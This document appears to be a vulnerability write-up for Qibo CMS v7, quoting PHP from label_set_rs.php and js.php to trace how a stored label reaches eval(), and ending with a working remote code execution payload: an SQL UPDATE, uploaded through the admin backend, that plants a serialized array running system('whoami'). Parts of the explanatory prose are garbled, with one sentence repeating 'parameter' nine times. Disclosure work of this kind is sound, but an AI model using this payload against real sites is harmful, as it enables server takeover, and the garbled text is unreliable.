Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

qibo_v7-Rce

label_set_rs.php

lobal $db,$pre,$timestamp,$webdb,$TB_url;
	//分类的话,对于分表的情况,要特别处理,不支持其它频道调用,会出错
	if($format[SYS]=='fenlei'&&!$rs[posttime]){
		global $Fid_db;
		$_erp=$Fid_db[tableid][$rs[fid]];		
		$rs=$db->get_one("SELECT * FROM {$pre}{$format[wninfo]}content$_erp WHERE id='$rs[id]' ");
	}

	//读取自定义字段的表,方便调用,如果声明了noReadMid就不要读了
	if($format[wninfo]&&$rs[mid]&&!$format[noReadMid]){
		$_rss=$db->get_one("SELECT * FROM {$pre}{$format[wninfo]}content_{$rs[mid]} WHERE id='$rs[id]' ");
		$_rss && $rs=$rs+$_rss;
	//文章要读取自定义字段的表,方便调用
	}elseif($format[SYS]=='artcile'&&$rs[mid]){
		$_rss=$db->get_one("SELECT * FROM {$pre}article_content_{$rs[mid]} WHERE aid='$rs[aid]' ");
		$_rss && $rs=$rs+$_rss;
	}

	//扩展接口,少用
	if($format[eval_code]){

		eval($format[eval_code]);

	}
$ format is the parameter parameter parameter parameter parameter parameter parameter parameter parameter that we pass in, $formati [eval_code] is a function when there is a value and a value.
function Get_Title($format){
	global $db,$webdb,$pre,$ModuleDB;
	
	//CMS万能文章专题里的文章

	if($format['SYS']=='CMS'&&$format['ctype']=='special'){
		return CMS_special($format);
	}


	//方便下面得到URL的真实列表地址
	$page=1;
	
	if(strstr($format[sql],'$GLOBALS[')){
		eval("\$format[sql]=\"$format[sql]\";");
	}
	if(strstr($format[sql2],'$GLOBALS[')){
		eval("\$format[sql2]=\"$format[sql2]\";");
	}
	//此处屏障报错,主要是处理不同版本之间存在的一些差异性问题
	$query=$db->query("$format[sql]",'','0');
	if(!$query){
		return ;
	}
 
	//辅助模板存在,并且辅助SQL存在的话,要读数据库
	if($format[tplpart_2code]&&$format[sql2]){
		$query2=$db->query($format[sql2],'','0');
		$rs2=$db->fetch_array($query2);
		$rs2=label_set_rs($format,$rs2);
	}
}
Here $format[SYS] cannot be CMS and $format[sql] is a sql statement that can be executed accurately, and both $format[sql2] and $format[tplpart_2code] must be true, then you can enter label_set_rs and then enter js.php Get_Title is called in it.

js.php

<?php
error_reporting(0);extract($_GET);
require_once(dirname(__FILE__)."/../data/config.php");
if(!eregi("^([0-9]+)$",$id)){
	die("document.write('ID不存在');");
}
$FileName=dirname(__FILE__)."/../cache/js/";

$FileName.="{$id}.php";
//默认缓存3分钟.
if(!$webdb["cache_time_js"]){

	$webdb["cache_time_js"]=3;
}
var_dump(!$webdb["cache_time_js"]);
echo (time()-filemtime($FileName));


if( (time()-filemtime($FileName))<($webdb["cache_time_js"]*60) ){
	@include($FileName);
	$show=str_replace(array("\n","\r","'"),array("","","\'"),stripslashes($show));
	if($iframeID){	//框架方式不会拖慢主页面打开速度,推荐
		//处理跨域问题
		if($webdb[cookieDomain]){
			echo "<SCRIPT LANGUAGE=\"JavaScript\">document.domain = \"$webdb[cookieDomain]\";</SCRIPT>";
		}
		echo "<SCRIPT LANGUAGE=\"JavaScript\">
		parent.document.getElementById('$iframeID').innerHTML='$show';
		</SCRIPT>";
	}else{			//JS式会拖慢主页面打开速度,不推荐
		echo "document.write('$show');";
	}
	exit;
}

require(dirname(__FILE__)."/"."global.php");
require_once(ROOT_PATH."inc/label_funcation.php");

	$query=$db->query(" SELECT * FROM {$pre}label WHERE lid='$id' ");

	while( $rs=$db->fetch_array($query) ){
		//读数据库的标签
		if( $rs[typesystem] )
		{
            unserialize($rs['code']);
			$_array=unserialize($rs[code]);
            var_dump($_array);
			$value=($rs[type]=='special')?Get_sp($_array):Get_Title($_array);
			if(strstr($value,"(/mv)")){
				$value=get_label_mv($value);
			}
			if($_array[c_rolltype])
			{
				$value="<marquee direction='$_array[c_rolltype]' scrolldelay='1' scrollamount='1' onmouseout='if(document.all!=null){this.start()}' onmouseover='if(document.all!=null){this.stop()}' height='$_array[roll_height]'>$value</marquee>";
			}
		}
First of all, the $id here is passed in through $_GET['id'] and must be a number. The id is spliced with the sql statement. When the data is queried, it will enter a loop, and then determine whether $rs[tyoesystem] is true. If it is true, it will enter the loop, and then deserialize $rs[code], and then $rs[type] here cannot be special, and then the array will be passed to Get_Title.
Login to background

Here we can upload a sql file, create a 1.sql, and write the following statement.


update  qb_label set code='a:6:{s:13:"tplpart_1code";s:4:"test";s:13:"tplpart_2code";s:4:"test";s:3:"SYS";s:7:"artcile";s:9:"eval_code";s:17:"system("whoami");";s:3:"sql";s:24:"select * from qb_article";s:4:"sql2";b:1;}',typesystem=1,type='code' where lid=741;
Then upload, the lid here can be blasted.
then visit

Use successfully.